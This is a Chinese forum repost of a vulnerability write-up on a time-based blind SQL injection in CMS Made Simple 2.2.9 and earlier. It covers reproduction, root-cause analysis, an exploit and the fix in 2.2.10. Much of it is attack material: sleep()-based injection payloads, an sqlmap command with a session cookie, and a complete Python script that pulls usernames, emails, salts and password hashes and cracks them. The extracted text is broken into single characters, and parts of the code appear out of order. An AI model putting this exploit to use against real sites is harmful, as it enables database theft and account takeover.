论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[14310] 2019-07-05_关于CMSMS中SQL注入漏洞的复现与分析与利用
文档创建者:
s7ckTeam
浏览次数:
10
最后更新:
2025-01-18
漏洞
10 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2019-07-05_关于CMSMS中SQL注入漏洞的复现与分析与利用
关
于
C
M
S
M
S
中
S
Q
L
注
入
漏
洞
的
复
现
与
分
析
与
利
用
N
e
r
o
q
i
F
r
e
e
B
u
f
2
0
1
9
-
0
7
-
0
5
前
言
前
言
C
M
S
M
a
d
e
S
i
m
p
l
e
(
C
M
S
M
S
)
是
一
个
简
单
且
便
捷
的
内
容
管
理
系
统
,
它
使
用
是
一
个
简
单
且
便
捷
的
内
容
管
理
系
统
,
它
使
用
P
H
P
、
、
M
y
S
Q
L
和
和
S
m
a
r
t
y
模
板
引
擎
开
发
,
具
有
基
于
角
色
的
权
限
管
理
系
统
,
基
于
向
导
的
安
装
与
更
新
机
制
,
对
系
统
模
板
引
擎
开
发
,
具
有
基
于
角
色
的
权
限
管
理
系
统
,
基
于
向
导
的
安
装
与
更
新
机
制
,
对
系
统
资
源
占
用
少
,
同
时
包
含
文
件
管
理
、
新
闻
发
布
以
及
资
源
占
用
少
,
同
时
包
含
文
件
管
理
、
新
闻
发
布
以
及
R
S
S
等
模
块
。
在
等
模
块
。
在
C
M
S
M
a
d
e
S
i
m
p
l
e
<
=
2
.
2
.
9
的
版
本
中
存
在
一
个
基
于
时
间
的
的
版
本
中
存
在
一
个
基
于
时
间
的
S
Q
L
盲
注
漏
洞
。
通
过
将
一
个
精
心
构
造
的
语
句
赋
值
给
新
闻
模
块
盲
注
漏
洞
。
通
过
将
一
个
精
心
构
造
的
语
句
赋
值
给
新
闻
模
块
中
的
中
的
m
1
_
i
d
l
i
s
t
参
数
,
可
以
利
用
该
参
数
,
可
以
利
用
该
S
Q
L
盲
注
漏
洞
。
盲
注
漏
洞
。
实
验
环
境
实
验
环
境
1
.
渗
透
主
机
:
K
a
l
i
-
L
i
n
u
x
-
2
0
1
9
.
2
-
v
m
-
i
3
8
6
2
.
目
标
主
机
:
C
N
_
W
i
n
d
o
w
s
7
_
x
8
6
_
s
p
1
3
.
软
件
版
本
:
C
M
S
M
a
d
e
S
i
m
p
l
e
2
.
2
.
8
涉
及
工
具
涉
及
工
具
1
.
B
u
r
p
S
u
i
t
e
v
1
.
7
.
3
6
2
.
p
y
t
h
o
n
-
2
.
7
.
1
5
3
.
M
o
z
i
l
l
a
F
i
r
e
f
o
x
6
0
.
6
.
2
漏
洞
复
现
漏
洞
复
现
1
.
漏
洞
U
R
L
如
下
:
“
h
t
t
p
:
/
/
s
e
r
v
e
r
-
i
p
/
c
m
s
m
s
/
m
o
d
u
l
e
i
n
t
e
r
f
a
c
e
.
p
h
p
?
m
a
c
t
=
N
e
w
s
,
m
1
_
,
d
e
f
a
u
l
t
,
0
&
m
1
_
i
d
l
i
s
t
=
”
当
参
数
m
1
_
i
d
l
i
s
t
赋
值
为
1
时
,
页
面
显
示
6
月
1
9
日
的
新
闻
,
c
m
s
m
s
页
面
如
下
:
当
参
数
m
1
_
i
d
l
i
s
t
赋
值
为
2
时
,
页
面
显
示
6
月
2
4
日
的
新
闻
,
c
m
s
m
s
页
面
如
下
:
由
此
可
见
,
当
给
参
数
m
1
_
i
d
l
i
s
t
赋
予
不
同
的
值
时
,
主
页
会
显
示
不
同
的
新
闻
内
容
,
即
m
1
_
i
d
l
i
s
t
对
应
的
是
新
闻
的
I
D
。
2
.
s
q
l
m
a
p
扫
描
2
.
1
获
取
c
o
o
k
i
e
设
置
M
o
z
i
l
l
a
F
i
r
e
f
o
x
浏
览
器
代
理
为
1
2
7
.
0
.
0
.
1
:
8
0
8
0
,
用
于
指
向
B
u
r
p
S
u
i
t
e
,
然
后
在
浏
览
器
中
访
问
漏
洞
U
R
L
,
再
通
过
B
u
r
p
S
u
i
t
e
中
的
H
T
T
P
h
i
s
t
o
r
y
找
到
C
o
o
k
i
e
的
详
细
信
息
,
如
下
图
所
示
:
2
.
2
结
合
步
骤
2
.
1
中
获
取
到
的
c
o
o
k
i
e
,
使
用
s
q
l
m
a
p
对
漏
洞
U
R
L
中
的
参
数
m
1
_
i
d
l
i
s
t
进
行
扫
描
测
试
,
s
q
l
m
a
p
扫
描
命
令
如
下
:
s
q
l
m
a
p
-
u
"
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
8
8
.
1
4
0
/
c
m
s
m
s
/
m
o
d
u
l
e
i
n
t
e
r
f
a
c
e
.
p
h
p
?
m
a
c
t
=
N
e
w
s
,
m
1
_
,
d
e
f
a
u
l
t
,
0
&
m
1
_
i
d
l
i
s
t
=
1
"
-
p
"
m
1
_
i
d
l
i
s
t
"
-
-
c
o
o
k
i
e
=
"
C
M
S
S
E
S
S
I
D
6
a
e
1
2
0
6
2
8
f
a
8
=
v
9
r
t
m
a
i
3
j
n
0
b
c
4
u
s
j
e
1
o
8
3
c
1
7
4
"
-
-
d
b
m
s
=
"
M
y
S
Q
L
"
-
-
l
e
v
e
l
3
-
-
r
i
s
k
3
2
.
3
等
待
了
一
段
漫
长
的
时
光
,
s
q
l
m
a
p
的
扫
描
结
果
如
下
图
所
示
(
居
然
告
诉
我
没
有
漏
洞
,
唉
,
看
来
神
器
也
有
靠
不
住
的
时
候
)
:
3
.
构
造
语
句
测
试
由
于
神
器
s
q
l
m
a
p
失
准
,
我
们
直
接
手
动
构
造
语
句
来
确
认
漏
洞
。
构
造
如
下
语
句
,
拼
接
到
参
数
m
1
_
i
d
l
i
s
t
之
后
:
首
先
设
置
s
l
e
e
p
的
参
数
为
1
s
,
运
行
结
果
如
下
图
所
示
,
可
以
看
到
服
务
器
的
响
应
时
间
为
1
1
4
1
m
s
(
即
1
.
1
4
1
s
)
:
再
次
设
置
s
l
e
e
p
的
参
数
为
5
s
,
运
行
结
果
如
下
图
所
示
,
可
以
看
到
服
务
器
的
响
应
时
间
为
5
1
6
3
m
s
(
即
5
.
1
6
3
s
)
:
当
设
置
s
l
e
e
p
的
参
数
为
1
0
s
时
,
服
务
器
的
响
应
时
间
为
1
0
1
8
4
m
s
(
即
1
0
.
1
8
4
s
)
。
不
断
增
大
s
l
e
e
p
的
参
数
值
,
响
应
时
间
也
在
逐
步
增
加
。
由
此
可
以
确
定
,
在
参
数
m
1
_
i
d
l
i
s
t
中
存
在
基
于
时
间
的
S
Q
L
盲
注
漏
洞
。
漏
洞
分
析
漏
洞
分
析
通
过
分
析
源
代
码
,
我
们
来
找
出
S
Q
L
注
入
漏
洞
的
产
生
点
,
有
关
的
问
题
代
码
如
下
图
所
示
:
以
上
这
段
代
码
,
在
将
数
组
中
的
元
素
强
制
转
换
成
整
型
之
后
,
做
了
一
个
条
件
判
断
和
一
个
u
n
s
e
t
操
作
,
看
似
对
变
量
i
d
l
i
s
t
的
输
入
做
了
过
滤
和
筛
查
,
其
实
然
并
卵
。
下
面
通
过
一
段
测
试
代
码
来
详
细
说
明
,
代
码
如
下
:
0
,
1
)
)
a
n
d
(
c
a
s
e
+
w
h
e
n
+
(
s
e
l
e
c
t
+
s
l
e
e
p
(
1
)
+
f
r
o
m
+
c
m
s
_
u
s
e
r
s
+
l
i
m
i
t
+
1
)
+
t
h
e
n
+
1
+
e
l
s
e
+
2
+
e
n
d
)
+
-
-
+
<
?
p
h
p
$
i
d
l
i
s
t
=
"
0
,
1
,
2
)
)
a
n
d
(
c
a
s
e
+
w
h
e
n
+
(
s
e
l
e
c
t
+
s
l
e
e
p
(
1
0
)
+
f
r
o
m
+
c
m
s
_
u
s
e
r
s
+
l
i
m
i
t
+
1
)
+
t
h
e
n
+
1
+
e
l
s
e
+
2
+
e
n
d
)
+
-
-
+
"
;
i
f
(
i
s
_
s
t
r
i
n
g
(
$
i
d
l
i
s
t
)
)
{
$
t
m
p
=
e
x
p
l
o
d
e
(
'
,
'
,
$
i
d
l
i
s
t
)
;
f
o
r
(
$
i
=
0
;
$
i
<
c
o
u
n
t
(
$
t
m
p
)
;
$
i
+
+
)
{
$
t
m
p
[
$
i
]
=
(
i
n
t
)
$
t
m
p
[
$
i
]
;
i
f
(
$
t
m
p
[
$
i
]
<
1
)
u
n
s
e
t
(
$
t
m
p
[
$
i
]
)
;
}
$
i
d
l
i
s
t
=
a
r
r
a
y
_
u
n
i
q
u
e
(
$
t
m
p
)
;
f
o
r
e
a
c
h
(
$
i
d
l
i
s
t
a
s
$
v
a
l
u
e
)
{
e
c
h
o
$
v
a
l
u
e
;
e
c
h
o
"
n
"
;
}
这
段
测
试
代
码
的
运
行
结
果
如
下
图
所
示
:
从
上
图
可
以
看
出
,
变
量
i
d
l
i
s
t
中
的
”
0
”
被
过
滤
掉
了
,
”
1
”
和
“
2
)
)
a
n
d
(
c
a
s
e
+
w
h
e
n
+
(
s
e
l
e
c
t
+
s
l
e
e
p
(
1
0
)
+
f
r
o
m
+
c
m
s
_
u
s
e
r
s
+
l
i
m
i
t
+
1
)
+
t
h
e
n
+
1
+
e
l
s
e
+
2
+
e
n
d
)
+
—
+
”
被
保
留
了
下
来
,
这
说
明
条
件
判
断
和
u
n
s
e
t
语
句
只
起
到
了
一
部
分
作
用
。
为
什
么
会
这
样
?
在
f
o
r
循
环
中
,
第
一
次
循
环
的
时
候
,
由
于
$
t
m
p
[
0
]
<
1
,
因
此
$
t
m
p
[
0
]
会
被
u
n
s
e
t
掉
,
那
么
第
二
次
循
环
中
的
c
o
u
n
t
(
$
t
m
p
)
实
际
上
比
第
一
次
循
环
少
了
1
(
少
了
被
u
n
s
e
t
掉
的
$
t
p
[
0
]
)
,
所
以
最
终
$
t
m
p
[
2
]
根
本
没
有
被
强
制
类
型
转
换
,
于
是
“
2
)
)
a
n
d
(
c
a
s
e
+
w
h
e
n
+
(
s
e
l
e
c
t
+
s
l
e
e
p
(
1
0
)
+
f
r
o
m
+
c
m
s
_
u
s
e
r
s
+
l
i
m
i
t
+
1
)
+
t
h
e
n
+
1
+
e
l
s
e
+
2
+
e
n
d
)
+
—
+
”
被
保
留
了
下
来
。
漏
洞
利
用
漏
洞
利
用
1
.
S
Q
L
盲
注
漏
洞
的
利
用
程
序
通
过
构
造
特
定
的
S
Q
L
语
句
拼
接
到
漏
洞
U
R
L
之
后
,
然
后
判
定
M
y
S
Q
L
的
s
l
e
e
p
时
长
,
以
此
来
枚
举
数
据
库
中
的
敏
感
信
息
。
该
程
序
包
含
g
e
t
_
s
a
l
t
(
)
、
g
e
t
_
u
s
e
r
n
a
m
e
(
u
s
e
r
i
d
)
、
g
e
t
_
e
m
a
i
l
(
u
s
e
r
i
d
)
、
g
e
t
_
p
a
s
s
w
o
r
d
(
u
s
e
r
i
d
)
、
c
r
a
c
k
_
p
a
s
s
w
o
r
d
(
)
、
b
e
a
u
t
i
f
y
_
p
r
i
n
t
(
)
以
及
m
a
i
n
(
)
等
组
成
部
分
。
其
中
g
e
t
_
s
a
l
t
(
)
函
数
获
取
由
系
统
随
机
生
成
的
s
a
l
t
值
,
用
于
c
r
a
c
k
_
p
a
s
s
w
o
r
d
(
)
函
数
破
解
用
户
密
码
;
g
e
t
_
u
s
e
r
n
a
m
e
(
u
s
e
r
i
d
)
函
数
用
于
获
取
c
m
s
m
s
的
用
户
名
;
g
e
t
_
e
m
a
i
l
(
u
s
e
r
i
d
)
函
数
用
于
获
取
用
户
对
应
的
邮
箱
;
g
e
t
_
p
a
s
s
w
o
r
d
(
u
s
e
r
i
d
)
函
数
用
于
获
取
用
户
对
应
的
密
码
,
此
密
码
为
密
文
;
c
r
a
c
k
_
p
a
s
s
w
o
r
d
(
)
函
数
结
合
s
a
l
t
值
、
密
文
密
码
以
及
自
定
义
字
典
来
破
解
用
户
密
码
。
程
序
的
详
细
代
码
如
下
所
示
:
}
?
>
i
m
p
o
r
t
r
e
q
u
e
s
t
s
f
r
o
m
t
e
r
m
c
o
l
o
r
i
m
p
o
r
t
c
o
l
o
r
e
d
i
m
p
o
r
t
t
i
m
e
f
r
o
m
t
e
r
m
c
o
l
o
r
i
m
p
o
r
t
c
p
r
i
n
t
i
m
p
o
r
t
o
p
t
p
a
r
s
e
i
m
p
o
r
t
h
a
s
h
l
i
b
u
r
l
_
v
u
l
n
=
'
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
8
8
.
1
4
0
/
c
m
s
m
s
/
m
o
d
u
l
e
i
n
t
e
r
f
a
c
e
.
p
h
p
?
m
a
c
t
=
N
e
w
s
,
m
1
_
,
d
e
f
a
u
l
t
,
0
&
m
1
_
i
d
l
i
s
t
=
'
s
e
s
s
i
o
n
=
r
e
q
u
e
s
t
s
.
S
e
s
s
i
o
n
(
)
d
i
c
t
i
o
n
a
r
y
=
'
1
2
3
4
5
6
7
8
9
0
q
w
e
r
t
y
u
i
o
p
a
s
d
f
g
h
j
k
l
z
x
c
v
b
n
m
Q
W
E
R
T
Y
U
I
O
P
A
S
D
F
G
H
J
K
L
Z
X
C
V
B
N
M
@
.
_
-
$
'
f
l
a
g
=
T
r
u
e
p
a
s
s
w
o
r
d
=
"
"
s
l
e
e
p
_
t
i
m
e
=
1
u
s
e
r
n
a
m
e
=
"
"
r
e
s
u
l
t
=
"
"
e
m
a
i
l
=
"
"
s
a
l
t
=
"
"
d
e
f
g
e
t
_
s
a
l
t
(
)
:
g
l
o
b
a
l
f
l
a
g
g
l
o
b
a
l
s
a
l
t
g
l
o
b
a
l
r
e
s
u
l
t
s
a
l
t
=
"
"
o
r
d
_
s
a
l
t
=
"
"
o
r
d
_
s
a
l
t
_
t
e
m
p
=
"
"
w
h
i
l
e
f
l
a
g
:
f
l
a
g
=
F
a
l
s
e
f
o
r
i
i
n
r
a
n
g
e
(
0
,
l
e
n
(
d
i
c
t
i
o
n
a
r
y
)
)
:
t
e
m
p
_
s
a
l
t
=
s
a
l
t
+
d
i
c
t
i
o
n
a
r
y
[
i
]
o
r
d
_
s
a
l
t
_
t
e
m
p
=
o
r
d
_
s
a
l
t
+
h
e
x
(
o
r
d
(
d
i
c
t
i
o
n
a
r
y
[
i
]
)
)
[
2
:
]
p
a
y
l
o
a
d
=
"
0
,
1
,
2
)
)
+
a
n
d
+
(
s
e
l
e
c
t
+
s
l
e
e
p
(
"
+
s
t
r
(
s
l
e
e
p
_
t
i
m
e
)
+
"
)
+
f
r
o
m
+
c
m
s
_
s
i
t
e
p
r
e
f
s
+
w
h
e
r
e
+
s
i
t
e
p
r
e
f
_
v
a
l
u
e
+
l
i
k
e
+
0
x
"
+
o
r
d
_
s
a
l
t
_
t
e
m
p
+
"
2
5
+
a
n
d
+
s
i
t
e
p
r
e
f
_
n
a
m
e
+
l
i
k
e
+
0
x
7
3
6
9
7
4
6
5
6
d
6
1
7
3
6
b
u
r
l
=
u
r
l
_
v
u
l
n
+
p
a
y
l
o
a
d
s
t
a
r
t
_
t
i
m
e
=
t
i
m
e
.
t
i
m
e
(
)
r
=
s
e
s
s
i
o
n
.
g
e
t
(
u
r
l
)
e
l
a
p
s
e
d
_
t
i
m
e
=
t
i
m
e
.
t
i
m
e
(
)
-
s
t
a
r
t
_
t
i
m
e
i
f
e
l
a
p
s
e
d
_
t
i
m
e
>
=
s
l
e
e
p
_
t
i
m
e
:
f
l
a
g
=
T
r
u
e
b
r
e
a
k
i
f
f
l
a
g
:
s
a
l
t
=
t
e
m
p
_
s
a
l
t
o
r
d
_
s
a
l
t
=
o
r
d
_
s
a
l
t
_
t
e
m
p
f
l
a
g
=
T
r
u
e
r
e
s
u
l
t
+
=
'
n
[
+
]
S
a
l
t
f
o
r
p
a
s
s
w
o
r
d
f
o
u
n
d
:
'
+
s
a
l
t
d
e
f
g
e
t
_
u
s
e
r
n
a
m
e
(
u
s
e
r
i
d
)
:
g
l
o
b
a
l
f
l
a
g
g
l
o
b
a
l
u
s
e
r
n
a
m
e
g
l
o
b
a
l
r
e
s
u
l
t
u
s
e
r
n
a
m
e
=
"
"
o
r
d
_
u
s
e
r
n
a
m
e
=
"
"
o
r
d
_
u
s
e
r
n
a
m
e
_
t
e
m
p
=
"
"
w
h
i
l
e
f
l
a
g
:
f
l
a
g
=
F
a
l
s
e
f
o
r
i
i
n
r
a
n
g
e
(
0
,
l
e
n
(
d
i
c
t
i
o
n
a
r
y
)
)
:
t
e
m
p
_
u
s
e
r
n
a
m
e
=
u
s
e
r
n
a
m
e
+
d
i
c
t
i
o
n
a
r
y
[
i
]
o
r
d
_
u
s
e
r
n
a
m
e
_
t
e
m
p
=
o
r
d
_
u
s
e
r
n
a
m
e
+
h
e
x
(
o
r
d
(
d
i
c
t
i
o
n
a
r
y
[
i
]
)
)
[
2
:
]
p
a
y
l
o
a
d
=
"
0
,
1
,
2
)
)
+
a
n
d
+
(
s
e
l
e
c
t
+
s
l
e
e
p
(
"
+
s
t
r
(
s
l
e
e
p
_
t
i
m
e
)
+
"
)
+
f
r
o
m
+
c
m
s
_
u
s
e
r
s
+
w
h
e
r
e
+
u
s
e
r
n
a
m
e
+
l
i
k
e
+
0
x
"
+
o
r
d
_
u
s
e
r
n
a
m
e
_
t
e
m
p
+
"
2
5
+
a
n
d
+
u
s
e
r
_
i
d
%
3
d
{
i
d
}
)
+
-
-
+
"
.
f
o
r
m
a
t
(
i
d
=
u
s
e
r
i
d
)
u
r
l
=
u
r
l
_
v
u
l
n
+
p
a
y
l
o
a
d
s
t
a
r
t
_
t
i
m
e
=
t
i
m
e
.
t
i
m
e
(
)
r
=
s
e
s
s
i
o
n
.
g
e
t
(
u
r
l
)
e
l
a
p
s
e
d
_
t
i
m
e
=
t
i
m
e
.
t
i
m
e
(
)
-
s
t
a
r
t
_
t
i
m
e
i
f
e
l
a
p
s
e
d
_
t
i
m
e
>
=
s
l
e
e
p
_
t
i
m
e
:
f
l
a
g
=
T
r
u
e
b
r
e
a
k
i
f
f
l
a
g
:
u
s
e
r
n
a
m
e
=
t
e
m
p
_
u
s
e
r
n
a
m
e
o
r
d
_
u
s
e
r
n
a
m
e
=
o
r
d
_
u
s
e
r
n
a
m
e
_
t
e
m
p
r
e
s
u
l
t
+
=
'
n
[
+
]
U
s
e
r
n
a
m
e
f
o
u
n
d
:
'
+
u
s
e
r
n
a
m
e
f
l
a
g
=
T
r
u
e
i
f
u
s
e
r
n
a
m
e
:
r
e
t
u
r
n
T
r
u
e
e
l
s
e
:
r
e
t
u
r
n
F
a
l
s
e
d
e
f
g
e
t
_
e
m
a
i
l
(
u
s
e
r
i
d
)
:
g
l
o
b
a
l
f
l
a
g
g
l
o
b
a
l
e
m
a
i
l
g
l
o
b
a
l
r
e
s
u
l
t
e
m
a
i
l
=
"
"
o
r
d
_
e
m
a
i
l
=
"
"
o
r
d
_
e
m
a
i
l
_
t
e
m
p
=
"
"
w
h
i
l
e
f
l
a
g
:
f
l
a
g
=
F
a
l
s
e
f
o
r
i
i
n
r
a
n
g
e
(
0
,
l
e
n
(
d
i
c
t
i
o
n
a
r
y
)
)
:
t
e
m
p
_
e
m
a
i
l
=
e
m
a
i
l
+
d
i
c
t
i
o
n
a
r
y
[
i
]
o
r
d
_
e
m
a
i
l
_
t
e
m
p
=
o
r
d
_
e
m
a
i
l
+
h
e
x
(
o
r
d
(
d
i
c
t
i
o
n
a
r
y
[
i
]
)
)
[
2
:
]
p
a
y
l
o
a
d
=
"
0
,
1
,
2
)
)
+
a
n
d
+
(
s
e
l
e
c
t
+
s
l
e
e
p
(
"
+
s
t
r
(
s
l
e
e
p
_
t
i
m
e
)
+
"
)
+
f
r
o
m
+
c
m
s
_
u
s
e
r
s
+
w
h
e
r
e
+
e
m
a
i
l
+
l
i
k
e
+
0
x
"
+
o
r
d
_
e
m
a
i
l
_
t
e
m
p
+
"
2
5
+
a
n
d
+
u
s
e
r
_
i
d
%
3
d
{
i
d
}
)
+
-
-
+
"
.
f
o
r
m
a
t
(
i
d
=
u
s
e
r
i
d
)
u
r
l
=
u
r
l
_
v
u
l
n
+
p
a
y
l
o
a
d
s
t
a
r
t
_
t
i
m
e
=
t
i
m
e
.
t
i
m
e
(
)
r
=
s
e
s
s
i
o
n
.
g
e
t
(
u
r
l
)
e
l
a
p
s
e
d
_
t
i
m
e
=
t
i
m
e
.
t
i
m
e
(
)
-
s
t
a
r
t
_
t
i
m
e
i
f
e
l
a
p
s
e
d
_
t
i
m
e
>
=
s
l
e
e
p
_
t
i
m
e
:
f
l
a
g
=
T
r
u
e
b
r
e
a
k
i
f
f
l
a
g
:
e
m
a
i
l
=
t
e
m
p
_
e
m
a
i
l
o
r
d
_
e
m
a
i
l
=
o
r
d
_
e
m
a
i
l
_
t
e
m
p
r
e
s
u
l
t
+
=
'
n
[
+
]
E
m
a
i
l
f
o
u
n
d
:
'
+
e
m
a
i
l
f
l
a
g
=
T
r
u
e
d
e
f
g
e
t
_
p
a
s
s
w
o
r
d
(
u
s
e
r
i
d
)
:
g
l
o
b
a
l
f
l
a
g
g
l
o
b
a
l
p
a
s
s
w
o
r
d
g
l
o
b
a
l
r
e
s
u
l
t
p
a
s
s
w
o
r
d
=
"
"
o
r
d
_
p
a
s
s
w
o
r
d
=
"
"
o
r
d
_
p
a
s
s
w
o
r
d
_
t
e
m
p
=
"
"
w
h
i
l
e
f
l
a
g
:
f
l
a
g
=
F
a
l
s
e
f
o
r
i
i
n
r
a
n
g
e
(
0
,
l
e
n
(
d
i
c
t
i
o
n
a
r
y
)
)
:
t
e
m
p
_
p
a
s
s
w
o
r
d
=
p
a
s
s
w
o
r
d
+
d
i
c
t
i
o
n
a
r
y
[
i
]
o
r
d
_
p
a
s
s
w
o
r
d
_
t
e
m
p
=
o
r
d
_
p
a
s
s
w
o
r
d
+
h
e
x
(
o
r
d
(
d
i
c
t
i
o
n
a
r
y
[
i
]
)
)
[
2
:
]
p
a
y
l
o
a
d
=
"
0
,
1
,
2
)
)
+
a
n
d
+
(
s
e
l
e
c
t
+
s
l
e
e
p
(
"
+
s
t
r
(
s
l
e
e
p
_
t
i
m
e
)
+
"
)
+
f
r
o
m
+
c
m
s
_
u
s
e
r
s
"
p
a
y
l
o
a
d
+
=
"
+
w
h
e
r
e
+
p
a
s
s
w
o
r
d
+
l
i
k
e
+
0
x
"
+
o
r
d
_
p
a
s
s
w
o
r
d
_
t
e
m
p
+
"
2
5
+
a
n
d
+
u
s
e
r
_
i
d
%
3
d
{
i
d
}
)
+
-
-
+
"
.
f
o
r
m
a
t
(
i
d
=
u
s
e
r
i
d
)
u
r
l
=
u
r
l
_
v
u
l
n
+
p
a
y
l
o
a
d
s
t
a
r
t
_
t
i
m
e
=
t
i
m
e
.
t
i
m
e
(
)
r
=
s
e
s
s
i
o
n
.
g
e
t
(
u
r
l
)
e
l
a
p
s
e
d
_
t
i
m
e
=
t
i
m
e
.
t
i
m
e
(
)
-
s
t
a
r
t
_
t
i
m
e
i
f
e
l
a
p
s
e
d
_
t
i
m
e
>
=
s
l
e
e
p
_
t
i
m
e
:
f
l
a
g
=
T
r
u
e
b
r
e
a
k
i
f
f
l
a
g
:
p
a
s
s
w
o
r
d
=
t
e
m
p
_
p
a
s
s
w
o
r
d
o
r
d
_
p
a
s
s
w
o
r
d
=
o
r
d
_
p
a
s
s
w
o
r
d
_
t
e
m
p
f
l
a
g
=
T
r
u
e
r
e
s
u
l
t
+
=
'
n
[
+
]
P
a
s
s
w
o
r
d
f
o
u
n
d
:
'
+
p
a
s
s
w
o
r
d
d
e
f
c
r
a
c
k
_
p
a
s
s
w
o
r
d
(
)
:
g
l
o
b
a
l
p
a
s
s
w
o
r
d
g
l
o
b
a
l
r
e
s
u
l
t
g
l
o
b
a
l
s
a
l
t
d
i
c
t
=
o
p
e
n
(
"
C
:
/
U
s
e
r
s
/
N
e
r
o
/
D
e
s
k
t
o
p
/
p
a
s
s
1
0
0
0
.
t
x
t
"
)
f
o
r
l
i
n
e
i
n
d
i
c
t
.
r
e
a
d
l
i
n
e
s
(
)
:
l
i
n
e
=
l
i
n
e
.
r
e
p
l
a
c
e
(
"
n
"
,
"
"
)
i
f
h
a
s
h
l
i
b
.
m
d
5
(
s
t
r
(
s
a
l
t
)
+
l
i
n
e
)
.
h
e
x
d
i
g
e
s
t
(
)
=
=
p
a
s
s
w
o
r
d
:
2
.
通
过
命
令
m
a
i
n
(
)
来
调
用
m
a
i
n
函
数
,
运
行
该
S
Q
L
盲
注
漏
洞
利
用
程
序
,
结
果
如
下
:
可
以
看
到
获
取
到
了
全
部
用
户
的
s
a
l
t
值
、
用
户
名
、
E
m
a
i
l
以
及
密
码
密
文
和
明
文
,
与
M
y
S
Q
L
数
据
库
中
记
录
的
内
容
完
全
一
致
,
数
据
库
信
息
详
见
下
图
:
3
.
使
用
获
取
到
的
用
户
名
和
密
码
可
以
成
功
登
录
c
m
s
m
s
。
漏
洞
修
复
漏
洞
修
复
针
对
该
版
本
号
的
S
Q
L
注
入
漏
洞
,
建
议
及
时
将
C
M
S
M
a
d
e
S
i
m
p
l
e
更
新
到
2
.
2
.
1
0
版
本
。
在
2
.
2
.
1
0
版
本
中
,
对
问
题
代
码
进
行
了
修
复
,
修
复
后
的
代
码
如
下
:
修
复
后
的
代
码
与
之
前
的
问
题
代
码
相
比
较
,
主
要
有
三
处
改
动
:
一
、
在
将
变
量
i
d
l
i
s
t
的
值
分
解
为
数
组
赋
值
给
变
量
t
m
p
之
后
,
i
d
l
i
s
t
被
置
为
空
;
二
、
新
增
变
量
v
a
l
,
用
于
将
强
制
类
型
转
换
后
的
数
据
传
递
给
i
d
l
i
s
t
;
改
变
i
f
语
句
判
断
条
件
和
操
作
,
防
止
发
生
c
o
u
n
t
(
$
t
m
p
)
-
1
和
重
复
字
符
的
操
作
。
通
过
下
面
的
这
段
测
试
代
码
,
可
以
很
直
观
的
看
到
效
果
:
i
f
h
a
s
h
l
i
b
.
m
d
5
(
s
t
r
(
s
a
l
t
)
+
l
i
n
e
)
.
h
e
x
d
i
g
e
s
t
(
)
=
=
p
a
s
s
w
o
r
d
:
r
e
s
u
l
t
+
=
"
n
[
+
]
P
a
s
s
w
o
r
d
c
r
a
c
k
e
d
:
"
+
l
i
n
e
b
r
e
a
k
d
i
c
t
.
c
l
o
s
e
(
)
d
e
f
b
e
a
u
t
i
f
y
_
p
r
i
n
t
(
)
:
g
l
o
b
a
l
r
e
s
u
l
t
c
p
r
i
n
t
(
r
e
s
u
l
t
,
'
g
r
e
e
n
'
,
a
t
t
r
s
=
[
'
b
o
l
d
'
]
)
d
e
f
m
a
i
n
(
)
:
g
l
o
b
a
l
r
e
s
u
l
t
f
o
r
i
i
n
r
a
n
g
e
(
1
,
1
0
)
:
g
e
t
_
s
a
l
t
(
)
u
s
e
r
_
e
x
i
s
t
=
g
e
t
_
u
s
e
r
n
a
m
e
(
i
)
i
f
u
s
e
r
_
e
x
i
s
t
:
g
e
t
_
e
m
a
i
l
(
i
)
g
e
t
_
p
a
s
s
w
o
r
d
(
i
)
c
r
a
c
k
_
p
a
s
s
w
o
r
d
(
)
b
e
a
u
t
i
f
y
_
p
r
i
n
t
(
)
r
e
s
u
l
t
=
"
"
e
l
s
e
:
b
r
e
a
k
m
a
i
n
(
)
<
?
p
h
p
$
i
d
l
i
s
t
=
"
0
,
1
,
2
)
)
a
n
d
(
c
a
s
e
+
w
h
e
n
+
(
s
e
l
e
c
t
+
s
l
e
e
p
(
1
0
)
+
f
r
o
m
+
c
m
s
_
u
s
e
r
s
+
l
i
m
i
t
+
1
)
+
t
h
e
n
+
1
+
e
l
s
e
+
2
+
e
n
d
)
+
-
-
+
"
;
i
f
(
i
s
_
s
t
r
i
n
g
(
$
i
d
l
i
s
t
)
)
{
$
t
m
p
=
e
x
p
l
o
d
e
(
'
,
'
,
$
i
d
l
i
s
t
)
;
$
i
d
l
i
s
t
=
[
]
;
f
o
r
(
$
i
=
0
;
$
i
<
c
o
u
n
t
(
$
t
m
p
)
;
$
i
+
+
)
{
$
v
a
l
=
(
i
n
t
)
$
t
m
p
[
$
i
]
;
i
f
(
$
v
a
l
>
0
&
&
!
i
n
_
a
r
r
a
y
(
$
v
a
l
,
$
i
d
l
i
s
t
)
)
$
i
d
l
i
s
t
[
]
=
$
v
a
l
;
}
f
o
r
e
a
c
h
(
$
i
d
l
i
s
t
a
s
$
v
a
l
u
e
)
{
e
c
h
o
$
v
a
l
u
e
;
e
c
h
o
"
n
"
;
}
?
>
这
段
测
试
代
码
的
运
行
结
果
如
下
图
所
示
:
从
上
图
中
,
我
们
可
以
看
到
,
变
量
i
d
l
i
s
t
的
值
被
过
滤
后
只
剩
下
合
规
的
”
1
”
和
”
2
”
,
其
他
的
字
符
串
都
被
滤
掉
了
,
这
样
基
于
时
间
的
S
Q
L
盲
注
漏
洞
也
就
被
修
复
了
。
*
本
文
作
者
:
本
文
作
者
:
N
e
r
o
q
i
,
本
文
属
,
本
文
属
F
r
e
e
B
u
f
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
精
彩
推
荐
精
彩
推
荐
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞